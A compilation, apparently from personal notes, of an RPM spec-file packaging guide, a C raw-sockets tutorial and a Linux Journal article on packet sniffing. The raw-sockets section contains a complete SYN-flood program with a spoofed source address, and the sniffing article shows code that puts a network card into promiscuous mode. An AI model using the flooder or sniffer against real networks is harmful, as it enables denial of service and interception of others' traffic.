make install prefix=$RPM_BUILD_ROOT/usr/local

Usually, it's a little hairier. If your program puts files in /etc, you have to tell make install (if you use make install). If a program hardcodes file locations at the make install stage, the best solution is to massage the output of make -n install. Truly devious programs such as qmail, which compile their own installer, may require patches to install correctly.

Other scripts

%clean
rm -rf $RPM_BUILD_ROOT

Generally, the only other script you need is %clean, which gets executed after the build (just clean out $RPM_BUILD_ROOT). You also get %pre (preinstall), %post (postinstall), %preun (preuninstall), %postun (postuninstall), %verifyscript (executed with rpm -V), and triggers (read the documentation included with rpm).


The %files section

%files
%defattr(-,bin,bin)
%doc COPYING AUTHORS EXAMPLES README RELDATE ChangeLog
/usr/local/bin/rc
/usr/local/bin/-
/usr/local/bin/--
/usr/local/bin/-p
/usr/local/bin/--p
/usr/local/man/man1/rc.1
/usr/local/man/man1/history.1

The %files section is where you list all the files in the package. You have a few commands at your disposal: %doc (marks documentation), %attr (marks attributes of a file - mode [- means don't change mode], user, group), %defattr (default attributes), %verify (see Maximum RPM), %config (marks configuration files), %dir and %docdir.

If a filename in the %files list corresponds to a directory, the package owns the directory as well as all the files in it; so don't put /usr/bin in your %files list. Be careful with globbing and directories; if you list a file twice, rpm will not build your package. Also, some symlinks (absolute ones) cause rpm to complain bitterly; avoid unintentionally grabbing them.

Methods for generating file lists

Unfortunately, generating file lists isn't always easy. Assuming that you didn't have to parse the output of make -n install yourself to write the %install section, try doing something sneaky like:

$ ./configure --prefix=/usr/local --sysconfdir=/etc
$ make
$ mkdir -p sandbox/usr/local/
$ make install prefix=`pwd`/sandbox/usr/local/ sysconfdir=`pwd`/etc
$ for i in `find sandbox -type f` ; do    # check to ensure that no files
> strings $i | grep sandbox && echo $i    # "know" that they were installed
> done                                    # in the build root

Check out the Makefile. Some packages use prefix; others use PREFIX, DESTDIR, or something different. Sometimes, you don't need to add the "usr/local" part. This is, incidentally, a good reason not to build packages as root: if you accidentally install the software on your system (instead of in an empty directory), you cannot test your package as easily.

Using the rudimentary genspec.pl script (or find(1)), you can use this directory to generate a file list. After you get a list, you may wish to replace long lists of files with globs. For instance:

/usr/local/lib/locale/cs/LC_MESSAGES/rpm.mo
/usr/local/lib/locale/de/LC_MESSAGES/rpm.mo
/usr/local/lib/locale/fi/LC_MESSAGES/rpm.mo
/usr/local/lib/locale/fr/LC_MESSAGES/rpm.mo
/usr/local/lib/locale/ja/LC_MESSAGES/rpm.mo
/usr/local/lib/locale/pl/LC_MESSAGES/rpm.mo
/usr/local/lib/locale/pt_BR/LC_MESSAGES/rpm.mo
/usr/local/lib/locale/ru/LC_MESSAGES/rpm.mo
/usr/local/lib/locale/sk/LC_MESSAGES/rpm.mo
/usr/local/lib/locale/sk/LC_MESSAGES/popt.mo
/usr/local/lib/locale/sl/LC_MESSAGES/rpm.mo
/usr/local/lib/locale/sr/LC_MESSAGES/rpm.mo
/usr/local/lib/locale/sv/LC_MESSAGES/rpm.mo
/usr/local/lib/locale/tr/LC_MESSAGES/rpm.mo
/usr/local/lib/locale/ro/LC_MESSAGES/popt.mo


becomes

/usr/local/lib/locale/*/LC_MESSAGES/*.mo

This makes packages more maintainable. If Spanish translations were added, the glob would catch them; otherwise, you would have to add /usr/local/lib/locale/es/LC_MESSAGES/rpm.mo to the file list. You have to be careful, however, that the globs catch only the files or directories you want.

Sometimes, it may be appropriate to generate a file list on the fly. The perl package does this:

%build
sh Configure -de -Dprefix=/usr/local -Dcpp='/opt/SUNWspro/bin/cc -E' \
 -Dcc='/opt/SUNWspro/bin/cc' \
 -Dinstallprefix="$RPM_BUILD_ROOT/usr/local" \
 -Dldflags='-L/usr/local/lib -R/usr/local/lib' -Dusethreads
make
make test

%install
rm -rf $RPM_BUILD_ROOT
mkdir -p $RPM_BUILD_ROOT/usr/local
make install

# clean up files which know about the build root
for fn in .packlist Config.pm ; do
 afn="$RPM_BUILD_ROOT/usr/local/lib/perl5/%{version}/%{perl_arch}/$fn"
 chmod 0644 $afn
 mv $afn $afn.TEMP
 sed "s#$RPM_BUILD_ROOT##g" < $afn.TEMP > $afn
 rm -f $afn.TEMP
done
chmod 0444 \
 $RPM_BUILD_ROOT/usr/local/lib/perl5/%{version}/%{perl_arch}/Config.pm

find $RPM_BUILD_ROOT -type f \( -name \*.h -o -name \*.a \) -print \
 | sed "s#^$RPM_BUILD_ROOT/*#/#" > DEVEL-LIST
find $RPM_BUILD_ROOT -type f ! \( -name \*.h -o -name \*.a \) -print \
 | sed "s#^$RPM_BUILD_ROOT/*#/#" > REGULAR-LIST

%files -f REGULAR-LIST
%doc Copying Artistic README

%files devel -f DEVEL-LIST

Subpackages

If you want to make more than one package out of a single source tree, you have to use subpackages. Here is an example of a spec file with subpackages:

Name: readline
Version: 4.1
Copyright: GPL
Group: System Environment/Libraries
Summary: GNU readline
Release: 1
Source: readline-4.1.tar.gz
Provides: libhistory.so
Provides: libreadline.so
BuildRoot: %{_tmppath}/%{name}-root

%description
GNU readline is a library that enables history, completion, and
emacs/vi-like motion functionality in a program linked with it.

%package devel
Summary: Readline header files, static libraries
Group: Development/Libraries
Requires: readline = 4.1

%description devel
This package contains the header files and static libraries for
readline. Install this package if you want to write or compile a
program that needs readline.

%prep
%setup -q

%build
autoconf
LDFLAGS="-L/usr/local/lib -R/usr/local/lib" ./configure \
 --prefix=/usr/local --enable-shared
make
make shared

%install
rm -rf $RPM_BUILD_ROOT
mkdir -p $RPM_BUILD_ROOT/usr/local
make install prefix=$RPM_BUILD_ROOT/usr/local
make install-shared prefix=$RPM_BUILD_ROOT/usr/local

%clean
rm -rf $RPM_BUILD_ROOT

%post
ln -s /usr/local/lib/libhistory.so.4 /usr/local/lib/libhistory.so
ln -s /usr/local/lib/libreadline.so.4 /usr/local/lib/libreadline.so
if [ -x /usr/local/bin/install-info ] ; then
 /usr/local/bin/install-info --info-dir=/usr/local/info \
  /usr/local/info/rluserman.info
 /usr/local/bin/install-info --info-dir=/usr/local/info \
  /usr/local/info/history.info
fi

%preun
rm /usr/local/lib/libhistory.so
rm /usr/local/lib/libreadline.so
if [ -x /usr/local/bin/install-info ] ; then
 /usr/local/bin/install-info --delete --info-dir=/usr/local/info \
  /usr/local/info/rluserman.info
 /usr/local/bin/install-info --delete --info-dir=/usr/local/info \
  /usr/local/info/history.info
fi

%files
%defattr(-,bin,bin)
%doc COPYING
/usr/local/lib/libhistory.so.4
/usr/local/lib/libreadline.so.4
/usr/local/info/readline.info
/usr/local/info/rluserman.info
/usr/local/info/history.info
/usr/local/man/man3/readline.3

%files devel
%defattr(-,bin,bin)
/usr/local/include/readline
/usr/local/lib/libreadline.a
/usr/local/lib/libhistory.a


This creates two packages: readline and readline-devel. (If you just want devel, replace %package devel with %package -n devel and %files with %files -n devel).

Style and Security

Don't build packages as root; edit prefix/lib/rpm/macros so you can build in your home directory. If you build as root, you run the risk of accidentally installing files on your system. Instead of using chown in %install, use %attr in %files.

Be careful when building on a multiuser system; the buildroot, if it is in a globally-writable directory, is a big security hole.

Don't use the %config directive. It might break packages that a user is upgrading; instead, at the end of %install, write

for i in `find $RPM_BUILD_ROOT/etc -type f` ; do
 mv $i $i.rpm
done

and warn the user in %post.

Don't make the user set his or her LD_LIBRARY_PATH. Instead, use -R. If you need to patch configure, patch configure.in instead. Don't interactively involve the user at build or compile time. Try to split your packages into static library/header "development" packages and shared library packages. If you are building GNU replacements for tools packaged with Solaris (e.g. fileutils, grep, tar), put them in /usr/local/gnu instead of /usr/local. Avoid putting any binaries in /usr/local/bin that conflict with any in /usr/ccs/bin, /usr/bin, etc.

Use %{_tmppath} instead of /free/tmp or /var/tmp; it is more portable.

For the complete guide:

rpm-guide.pdf

My note:

In RPM scripts, to refer to the prefix variable used for relocation (rpm -ivh XXXX.rpm --prefix), use:

$RPM_INSTALL_PREFIX


A brief programming tutorial in C for raw sockets (Linux C++)

http://csis.bits-pilani.ac.in/faculty/dk_tyagi/Study_stuffs/raw.html

[ Other resources: IP SPOOFING with BSD RAW SOCKETS INTERFACE.docx ]

1. Raw sockets
2. The protocols IP, ICMP, TCP and UDP
3. Building and injecting datagrams
4. Basic transport layer operations

In this tutorial, you'll learn the basics of using raw sockets in C to insert any IP-protocol-based datagram into the network traffic. This is useful, for example, to build raw socket scanners like nmap, to spoof, or to perform operations that need to send out raw packets. Basically, you can send any packet at any time, whereas using the interface functions of your system's IP stack (connect, write, bind, etc.) you have no direct control over the packets. This theoretically enables you to simulate the behavior of your OS's IP stack, and also to send stateless traffic (datagrams that don't belong to a valid connection).

I. Raw sockets

The basic concept of low level sockets is to send a single packet at one time, with all the protocol headers filled in by the program (instead of the kernel). Unix provides two kinds of sockets that permit direct access to the network. One is SOCK_PACKET, which receives and sends data on the device link layer. This means, the NIC specific header is included in the data that will be written or read. For most networks, this is the ethernet header. Of course, all subsequent protocol headers will also be included in the data. The socket type we'll be using, however, is SOCK_RAW, which includes the IP headers and all subsequent protocol headers and data.

The (simplified) link layer model looks like this:

Physical layer -> Device layer (Ethernet protocol) -> Network layer (IP) -> Transport layer (TCP, UDP, ICMP) -> Session layer (application specific data)

Now to some practical stuff. A standard command to create a datagram socket is:

socket (PF_INET, SOCK_RAW, IPPROTO_UDP);

From the moment that it is created, you can send any IP packets over it, and receive any IP packets that the host received after that socket was created if you read() from it. Note that even though the socket is an interface to the IP header, it is transport layer specific. That means, for listening to TCP, UDP and ICMP traffic, you have to create 3 separate raw sockets, using IPPROTO_TCP, IPPROTO_UDP and IPPROTO_ICMP (the protocol numbers are 6 for tcp, 17 for udp and 1 for icmp).

With this knowledge, we can, for example, already create a small sniffer, that dumps out the contents of all tcp packets we receive. (Headers, etc. are missing, this is just an example. As you see, we are skipping the IP and TCP headers which are contained in the packet, and print out the payload, the data of the session/application layer, only).

int fd = socket (PF_INET, SOCK_RAW, IPPROTO_TCP);
char buffer[8192]; /* single packets are usually not bigger than 8192 bytes */

while (read (fd, buffer, 8192) > 0)
    printf ("Caught tcp packet: %s\n",
            buffer + sizeof(struct iphdr) + sizeof(struct tcphdr));


II. The protocols IP, ICMP, TCP and UDP

To inject your own packets, all you need to know is the structure of the protocols that need to be included. Below you will find a short introduction to the IP, ICMP, TCP and UDP headers. It is recommended to build your packet by using a struct, so you can comfortably fill in the packet headers. Unix systems provide standard structures in the system header files. You can always create your own structs, as long as the length of each field is correct. To help you create portable programs, we'll use the BSD names in our structures. We'll also use the little endian notation. On big endian machines (processor architectures other than intel x86), the two 4-bit fields exchange places. However, the structures can be used in the same way in this program. Below each header structure is a short explanation of its members, so that you know what values should be filled in and which meaning they have.

The data types/sizes we need to use are: unsigned char - 1 byte (8 bits), unsigned short int - 2 bytes (16 bits) and unsigned int - 4 bytes (32 bits)

struct ipheader {
  unsigned char ip_hl:4, ip_v:4; /* this means that each member is 4 bits */
  unsigned char ip_tos;
  unsigned short int ip_len;
  unsigned short int ip_id;
  unsigned short int ip_off;
  unsigned char ip_ttl;
  unsigned char ip_p;
  unsigned short int ip_sum;
  unsigned int ip_src;
  unsigned int ip_dst;
}; /* total ip header length: 20 bytes (=160 bits) */

The Internet Protocol is the network layer protocol, used for routing the data from the source to its destination. Every datagram contains an IP header followed by a transport layer protocol such as tcp.

ip_hl: the ip header length in 32-bit words. A value of 5 means 20 bytes (5 * 4). Values other than 5 are only needed if the ip header contains options (mostly used for routing).
ip_v: the ip version, always 4 (maybe I'll write an IPv6 tutorial later ;)
ip_tos: type of service, controls the priority of the packet. 0x00 is normal. The first 3 bits stand for routing priority, the next 4 bits for the type of service (delay, throughput, reliability and cost).
ip_len: the total length of the ip datagram. This includes the ip header, the icmp/tcp/udp header and the payload size, in bytes.
ip_id: the id sequence number, mainly used for reassembly of fragmented IP datagrams. When sending single datagrams, each can have an arbitrary ID.
ip_off: the fragment offset, used for reassembly of fragmented datagrams. The first 3 bits are the fragment flags: the first is always 0, the second is the do-not-fragment bit (set by ip_off |= 0x4000) and the third is the more-fragments-following bit (ip_off |= 0x2000). The remaining 13 bits are the fragment offset, counting in 8-byte blocks of data already sent.
ip_ttl: time to live, the number of hops (routers to pass) before the packet is discarded and an icmp error message is returned. The maximum is 255.
ip_p: the transport layer protocol. Can be tcp (6), udp (17), icmp (1), or whatever protocol follows the ip header. Look in /etc/protocols for more.
ip_sum: the checksum for the whole ip datagram. Every time anything in the datagram changes, it needs to be recalculated, or the packet will be discarded by the next router (see the csum() function in section III below).
ip_src and ip_dst: source and destination IP address, converted to long format, e.g. by inet_addr(). Both can be chosen arbitrarily.


IP itself has no mechanism for establishing and maintaining a connection, or even for carrying data as a direct payload. The Internet Control Message Protocol is merely an addition to IP that carries error, routing and control messages and data, and is often considered a network layer protocol.

struct icmpheader {
  unsigned char icmp_type;
  unsigned char icmp_code;
  unsigned short int icmp_cksum;
  /* The following data structures are ICMP type specific */
  unsigned short int icmp_id;
  unsigned short int icmp_seq;
}; /* total icmp header length: 8 bytes (=64 bits) */

icmp_type: the message type, for example 0 - echo reply, 8 - echo request, 3 - destination unreachable. Look in <netinet/ip_icmp.h> for all the types.
icmp_code: significant when sending an error message (unreach), specifying the kind of error. Again, consult the include file for more.
icmp_cksum: the checksum for the icmp header + data, computed the same way as the IP checksum. Note: the next 32 bits in an icmp packet can be used in many different ways, depending on the icmp type and code. The most commonly seen structure, an ID and a sequence number, is used in echo requests and replies, hence we only use this one; but keep in mind that the header can actually be more complex.
icmp_id: used in echo request/reply messages to identify the request.
icmp_seq: identifies the sequence of echo messages, if more than one is sent.

The User Datagram Protocol is a transport protocol for sessions that need to exchange data. Both transport protocols, UDP and TCP, provide 65535 different source and destination ports. The destination port is used to connect to a specific service on that port. Unlike TCP, UDP is not reliable: it doesn't use sequence numbers or stateful connections, so UDP datagrams can be spoofed, and they can be lost unnoticed, since they are not acknowledged with replies and sequence numbers.

struct udpheader {
  unsigned short int uh_sport;
  unsigned short int uh_dport;
  unsigned short int uh_len;
  unsigned short int uh_check;
}; /* total udp header length: 8 bytes (=64 bits) */

uh_sport: the source port that a client bind()s to, and that the contacted server will reply to in order to direct its responses to the client.
uh_dport: the destination port on which a specific server can be contacted.
uh_len: the length of the udp header plus payload data, in bytes.
uh_check: the checksum of header and data; see the IP checksum.

The Transmission Control Protocol is the most widely used transport protocol. It provides mechanisms to establish a reliable connection with some basic authentication, using connection states and sequence numbers. (See IV. Basic transport layer operations.)

struct tcpheader {
  unsigned short int th_sport;
  unsigned short int th_dport;
  unsigned int th_seq;
  unsigned int th_ack;
  unsigned char th_x2:4, th_off:4;
  unsigned char th_flags;
  unsigned short int th_win;
  unsigned short int th_sum;
  unsigned short int th_urp;
}; /* total tcp header length: 20 bytes (=160 bits) */


th_sport: the source port, which has the same function as in UDP.
th_dport: the destination port, which has the same function as in UDP.
th_seq: the sequence number, used to enumerate the TCP segments. The data in a TCP connection can be contained in any number of segments (= single tcp datagrams), which will be put in order and acknowledged. For example, if you send 3 segments, each containing 32 bytes of data, the first sequence would be (N+)1, the second (N+)33 and the third (N+)65. "N+" because the initial sequence is random.
th_ack: every packet that is sent and is a valid part of a connection is acknowledged with an empty TCP segment with the ACK flag set (see below) and the th_ack field containing the previous th_seq number.
th_x2: unused; contains binary zeroes.
th_off: the segment offset, specifying the length of the TCP header in 32bit/4byte blocks. Without tcp header options, the value is 5.
th_flags: this field consists of six binary flags. Using bsd headers, they can be combined like this: th_flags = FLAG1 | FLAG2 | FLAG3...
  TH_URG: Urgent. The segment will be processed with priority; used for termination of a connection or to stop processes (in the telnet protocol).
  TH_ACK: Acknowledgement. Used to acknowledge data and in the second and third stage of a TCP connection initiation (see IV.).
  TH_PSH: Push. The system's IP stack will not buffer the segment but forward it to the application immediately (mostly used with telnet).
  TH_RST: Reset. Tells the peer that the connection has been terminated.
  TH_SYN: Synchronization. A segment with the SYN flag set indicates that a client wants to initiate a new connection to the destination port.
  TH_FIN: Final. The connection should be closed; the peer is supposed to answer with one last segment with the FIN flag set as well.
th_win: Window. The number of bytes that can be sent before the data must be acknowledged with an ACK before sending more segments.
th_sum: the checksum over pseudo header, tcp header and payload. The pseudo header is a structure containing the IP source and destination address, 1 byte set to zero, the protocol (1 byte with a decimal value of 6), and 2 bytes (unsigned short) containing the total length of the tcp segment.
th_urp: Urgent pointer. Only used if the urgent flag is set, else zero. It points to the end of the payload data that should be sent with priority.


III. Building and injecting datagrams

Now, by putting together the knowledge about the protocol header structures with some basic C functions, it is easy to construct and send any datagram(s). We will demonstrate this with a small sample program that constantly sends out SYN requests to one host (a SYN flooder).

#define __USE_BSD           /* use bsd'ish ip header */
#include <sys/socket.h>     /* these headers are for a Linux system, but */
#include <netinet/in.h>     /* the names on other systems are easy to guess.. */
#include <netinet/ip.h>
#define __FAVOR_BSD         /* use bsd'ish tcp header */
#include <netinet/tcp.h>
#include <arpa/inet.h>      /* inet_addr() */
#include <stdio.h>          /* printf() */
#include <stdlib.h>         /* random() */
#include <string.h>         /* memset() */

#define P 25 /* let's flood the sendmail port */

unsigned short          /* this function generates header checksums */
csum (unsigned short *buf, int nwords)
{
  unsigned long sum;
  for (sum = 0; nwords > 0; nwords--)
    sum += *buf++;
  sum = (sum >> 16) + (sum & 0xffff);
  sum += (sum >> 16);
  return ~sum;
}

int main (void)
{
  int s = socket (PF_INET, SOCK_RAW, IPPROTO_TCP); /* open raw socket */
  char datagram[4096]; /* this buffer will contain ip header, tcp header,
                          and payload. we'll point an ip header structure
                          at its beginning, and a tcp header structure
                          after that to write the header values into it */
  struct ip *iph = (struct ip *) datagram;
  struct tcphdr *tcph = (struct tcphdr *) (datagram + sizeof (struct ip));
  struct sockaddr_in sin;

  /* the sockaddr_in containing the dest. address is used
     in sendto() to determine the datagram's path */
  sin.sin_family = AF_INET;
  sin.sin_port = htons (P); /* you byte-order >1byte header values to network
                               byte order (not needed on big endian machines) */
  sin.sin_addr.s_addr = inet_addr ("127.0.0.1");

  memset (datagram, 0, 4096); /* zero out the buffer */

  /* we'll now fill in the ip/tcp header values, see above for explanations */
  iph->ip_hl = 5;
  iph->ip_v = 4;
  iph->ip_tos = 0;
  iph->ip_len = sizeof (struct ip) + sizeof (struct tcphdr); /* no payload */
  iph->ip_id = htons (54321); /* the value doesn't matter here */
  iph->ip_off = 0;
  iph->ip_ttl = 255;
  iph->ip_p = 6;
  iph->ip_sum = 0; /* set it to 0 before computing the actual checksum later */
  iph->ip_src.s_addr = inet_addr ("1.2.3.4"); /* SYN's can be blindly spoofed */
  iph->ip_dst.s_addr = sin.sin_addr.s_addr;
  tcph->th_sport = htons (1234); /* arbitrary port */


  tcph->th_dport = htons (P);
  tcph->th_seq = random (); /* in a SYN packet, the sequence is a random */
  tcph->th_ack = 0;         /* number, and the ack sequence is 0 in the 1st packet */
  tcph->th_x2 = 0;
  tcph->th_off = 5;         /* tcp header length in 32-bit words, no options */
  tcph->th_flags = TH_SYN;  /* initial connection request */
  tcph->th_win = htons (65535); /* maximum allowed window size */
  tcph->th_sum = 0; /* if you set a checksum to zero, your kernel's IP stack
                       should fill in the correct checksum during transmission */
  tcph->th_urp = 0;

iph->ip_sum = csum ((unsigned short *) datagram, iph->ip_len >> 1);

  /* finally, it is very advisable to set the IP_HDRINCL socket option, to make
     sure that the kernel knows the header is included in the data, and doesn't
     insert its own header into the packet before our data */

  { /* lets do it the ugly way.. */
    int one = 1;
    const int *val = &one;
    if (setsockopt (s, IPPROTO_IP, IP_HDRINCL, val, sizeof (one)) < 0)
      printf ("Warning: Cannot set HDRINCL!\n");
  }

  while (1)
    {
      if (sendto (s,                        /* our socket */
                  datagram,                 /* the buffer containing headers and data */
                  iph->ip_len,              /* total length of our datagram */
                  0,                        /* routing flags, normally always 0 */
                  (struct sockaddr *) &sin, /* socket addr, just like in */
                  sizeof (sin)) < 0)        /* a normal send() */
        printf ("error\n");
      else
        printf (".");
    }

  return 0;
}

IV. Basic transport layer operations

To make use of raw packets, knowledge of the basic IP stack operations is essential. I'll try to give a brief introduction to the most important operations in the IP stack. To learn more about the behavior of the protocols, one option is to examine the source of your system's IP stack, which, in Linux, is located in the directory /usr/src/linux/net/ipv4/. The most important protocol, of course, is TCP, on which I will focus.

Connection initiation: to contact a udp or tcp server listening on port 1234, the client calls connect() with a sockaddr structure containing the destination address and port. If the client did not bind() to a source port, the system's IP stack will select one to bind to. By connect()ing, the host sends a datagram containing the following information: IP src: client address, IP dst: server address, TCP/UDP src: client's source port, TCP/UDP dst: port 1234. If a server is listening on port 1234 on the destination host, it will reply with a datagram containing: IP src: server, IP dst: client, srcport: server port, dstport: client's source port. If there is no server on the host, an ICMP unreach message is created, subcode "Connection refused". The client will then terminate. If the destination host is down, either a router will create a different ICMP unreach message, or the client gets no reply and the connection times out.

TCP initiation ("3-way handshake") and connection: The client performs a connection initiation, with the tcp SYN flag set, an arbitrary sequence number, and no acknowledgement number. The server acknowledges the SYN by sending a packet with SYN and ACK set, another random sequence number, and an acknowledgement number equal to the client's sequence number plus one. Finally, the client replies with a tcp datagram with the ACK flag set and an acknowledgement number equal to the server's sequence number plus one. Once the connection is established, each tcp segment is sent with no flags (PSH and URG are optional), the sequence number for each packet incremented by the size of the previous tcp segment. After the amount of data specified as "window size" has been transferred, the peer sending data will wait for an acknowledgement: a tcp segment with the ACK flag set and the ack sequence number of the last data packet that could be received in order. That way, if any segments get lost, they will not be acknowledged and can be retransmitted. To end a connection, both server and client send a tcp packet with correct sequence numbers and the FIN flag set, and if the connection ever de-synchronizes (aborted, bad sequence numbers, etc.), the peer that notices the error will send a RST packet with correct seq numbers to terminate the connection.

The Linux Socket Filter: Sniffing Bytes over the Network (Linux C++)

From: http://www.linuxjournal.com/article/4659

A feature added to the kernel with the 2.2 release, the Linux socket filter (LSF) can be programmed to let the kernel decide which packets an application should be granted access to. Here's how.

If you deal with network administration or security management, or if you are merely curious about what is passing by over your local network, grabbing some packets off the network card can be a useful exercise. With a little bit of C coding and a basic knowledge of networking, you will be able to capture data even if it is not addressed to your machine. In this article, we will refer to Ethernet networks, by far the most widespread LAN technology. Also, for reasons that will be explained later, we will assume that source and destination hosts belong to the same LAN.

First off, we will briefly recall how a common Ethernet network card works. Those of you who are already skilled in this field may safely skip to the next paragraph. IP packets sourced from users' applications are encapsulated into Ethernet frames (this is the name given to packets when sent over an Ethernet segment), which are just bigger lower-level packets containing the original IP packet and some information needed to carry it to its destination (see Figure 1). In particular, the destination IP address is mapped to a 6-byte destination Ethernet address (often called MAC address) through a mechanism called ARP. Thus, the frame containing the packet travels from the source host to the destination host over the cable that connects them. It is likely that the frame will go through network devices such as hubs and switches, but since we assumed no LAN borders are crossed, no routers or gateways will be involved.

Figure 1. IP Packets as Ethernet Frames

No routing process happens at the Ethernet level. In other words, the frame sent by the source host will not be headed directly toward the destination host; instead, the frame will be copied over all the cables that make up the LAN, and all the network cards will see it passing (see Figure 2). Each network card will start reading the first six bytes of the frame (which happen to contain the above-mentioned destination MAC addresses), but only one card will recognize its own address in the destination field and will pick up the frame. At this point, the frame will be taken apart by the network driver and the original IP packet will be recovered and passed up to the receiving application through the network protocol stack.


Figure 2. Sending Ethernet Frames over the LAN

More precisely, the network driver will have a look at the Protocol Type field inside the Ethernet frame header (see Figure 1) and, based on that value, forward the packet to the appropriate protocol receiving function. Most of the time the protocol will be IP, and the receiving function will take off the IP header and pass the payload up to the UDP- or TCP-receiving functions. These protocols, in turn, will pass it to the socket-handling functions, which will eventually deliver packet data to the receiving application in userland. During this trip, the packet loses all network information related to it, such as the source addresses (IP and MAC) and port, IP options, TCP parameters and so on. Furthermore, if the destination host does not have an open socket with the correct parameters, the packet will be discarded and never make it to the application level.

As a consequence, we have two distinct issues in sniffing packets over the network. One is related to Ethernet addressing—we cannot read packets that are not destined to our host; the other is related to protocol stack processing—in order for the packet not to be discarded, we should have a listening socket for each and every port. Furthermore, part of the packet information is lost during protocol stack processing.

The first issue is not fundamental, since we may not be interested in other hosts' packets and may only want to sniff the packets directed to our machine. The second one, however, must be solved. We will see how to address these issues separately, starting with the latter.

The PF_PACKET Protocol

When you open a socket with the standard call sock = socket(domain, type, protocol) you have to specify which domain (or protocol family) you are going to use with that socket. Commonly used families are PF_UNIX, for communications bounded on the local machine, and PF_INET, for communications based on IPv4 protocols. Furthermore, you have to specify a type for your socket, and possible values depend on the family you specified. Common values for type, when dealing with the PF_INET family, include SOCK_STREAM (typically associated with TCP) and SOCK_DGRAM (associated with UDP). Socket types influence how packets are handled by the kernel before being passed up to the application. Finally, you specify the protocol that will handle the packets flowing through the socket (more details on this can be found on the socket(2) man page).

In recent versions of the Linux kernel (post-2.0 releases) a new protocol family has been introduced, named PF_PACKET. This family allows an application to send and receive packets dealing directly with the network card driver, thus avoiding the usual protocol stack-handling (e.g., IP/TCP or IP/UDP processing). That is, any packet sent through the socket will be directly passed to the Ethernet interface, and any packet received through the interface will be directly passed to the application.


The PF_PACKET family supports two slightly different socket types, SOCK_DGRAM and SOCK_RAW. The former leaves to the kernel the burden of adding and removing Ethernet level headers. The latter gives the application complete control over the Ethernet header. The protocol field in the socket() call must match one of the Ethernet IDs defined in /usr/include/linux/if_ether.h, which represents the registered protocols that can be shipped in an Ethernet frame. Unless dealing with very specific protocols, you typically use ETH_P_IP, which encompasses all of the IP-suite protocols (e.g., TCP, UDP, ICMP, raw IP and so on).

Since they have pretty serious security implications (for example, you may forge a frame with a spoofed MAC address), PF_PACKET-family sockets may only be used by root.

The PF_PACKET family easily solves the problem associated with protocol stack-handling of our sniffed packets. Let's see it do so with the example in Listing 1. We open a socket belonging to the PF_PACKET family, specifying a SOCK_RAW socket type and IP-related protocol type. Then we start reading from the socket and, after a few sanity checks, we print out some information extracted from the Ethernet level and IP level headers. By cross-checking the printed addresses with the offsets in Figure 1, you will see how easy it is for the application to get access to network level data.

Listing 1. Protocol Stack-Handling Sniffed Packets

Assuming that your machine is connected to an Ethernet LAN, you can experiment with our short example by running it while generating packets directed to your host from another machine (you can ping or Telnet to your host). You will be able to see all the packets directed to you, but you will not see any packet headed toward other hosts.

Promiscuous vs. Nonpromiscuous Mode

The PF_PACKET family allows an application to retrieve data packets as they are received at the network card level, but still does not allow it to read packets that are not addressed to its host. As we have seen before, this is due to the network card discarding all the packets that do not contain its own MAC address—an operation mode called nonpromiscuous, which basically means that each network card is minding its own business and reading only the frames directed to it. There are three exceptions to this rule: a frame whose destination MAC address is the special broadcast address (FF:FF:FF:FF:FF:FF) will be picked up by any card; a frame whose destination MAC address is a multicast address will be picked up by cards that have multicast reception enabled; and a card that has been set in promiscuous mode will pick up all the packets it sees.

The last case is, of course, the most interesting one for our purposes. To set a network card to promiscuous mode, all we have to do is issue a particular ioctl() call to an open socket on that card. Since this is a potentially security-threatening operation, the call is only allowed for the root user. Supposing that “sock” contains an already open socket, the following instructions will do the trick:

strncpy (ethreq.ifr_name, "eth0", IFNAMSIZ);
ioctl (sock, SIOCGIFFLAGS, &ethreq);
ethreq.ifr_flags |= IFF_PROMISC;
ioctl (sock, SIOCSIFFLAGS, &ethreq);

(where ethreq is an ifreq structure, defined in /usr/include/net/if.h). The first ioctl reads the current value of the Ethernet card flags; the flags are then ORed with IFF_PROMISC, which enables promiscuous mode, and are written back to the card with the second ioctl.

Let's see it in a more complete example (see Listing 2 at ftp://ftp.ssc.com/pub/lj/listings/issue86/). If you compile and run it as root on a machine connected to a LAN, you will be able to see all the packets flowing on the cable, even if they are not for your host. This is because your network card is now working in promiscuous mode. You can easily check it out by giving the ifconfig command and observing the third line in the output.


Note that if your LAN uses Ethernet switches instead of hubs, you will see only packets flowing in the switch's branch you belong to. This is due to the way switches work, and there is very little you can do about it (except for deceiving the switch with MAC address-spoofing, which is outside the scope of this article). For more information on hubs and switches, please have a look at the articles cited in the Resources section.

The Linux Packet Filter

All our sniffing problems seem to be solved right now, but there is still one important thing to consider: if you actually tried the example in Listing 2, and if your LAN serves even a modest amount of traffic (a couple of Windows hosts will be enough to waste some bandwidth with a good number of NETBIOS packets), you will have noticed our sniffer prints out too much data. As network traffic increases, the sniffer will start losing packets since the PC will not be able to process them quickly enough.

The solution to this problem is to filter the packets you receive, and print out information only on those you are interested in. One idea would be to insert an “if statement” in the sniffer's source; this would help polish the output of the sniffer, but it would not be very efficient in terms of performance. The kernel would still pull up all the packets flowing on the network, thus wasting processing time, and the sniffer would still examine each packet header to decide whether to print out the related data or not.

The optimal solution to this problem is to put the filter as early as possible in the packet-processing chain (it starts at the network driver level and ends at the application level, see Figure 3). The Linux kernel allows us to put a filter, called an LPF, directly inside the PF_PACKET protocol-processing routines, which are run shortly after the network card reception interrupt has been served. The filter decides which packets shall be relayed to the application and which ones should be discarded.

Figure 3. Packet-Processing Chain

In order to be as flexible as possible, and not to limit the programmer to a set of predefined conditions, the packet-filtering engine is actually implemented as a state machine running a user-defined program. The program is written in a specific pseudo-machine code language called BPF (for Berkeley packet filter), inspired by an old paper written by Steve McCanne and Van Jacobson (see Resources). BPF actually looks like a real assembly language with a couple of registers and a few instructions to load and store values, perform arithmetic operations and conditionally branch.

The filter code is run on each packet to be examined, and the memory on which the BPF processor operates is the buffer containing the packet data. The result of the filter is an integer number that specifies how many bytes of the packet (if any) the socket should pass to the application level. This is a further advantage, since often you are interested in just the first few bytes of a packet, and you can spare processing time by avoiding copying the excess ones.


(Not) Programming the Filter

Even if the BPF language is pretty simple and easy to learn, most of us would probably be more comfortable with filters written in human-readable expressions. So, instead of presenting the details and instructions of the BPF language (which you can find in the above-mentioned paper), we will discuss how to obtain the code for a working filter starting from a logic expression.

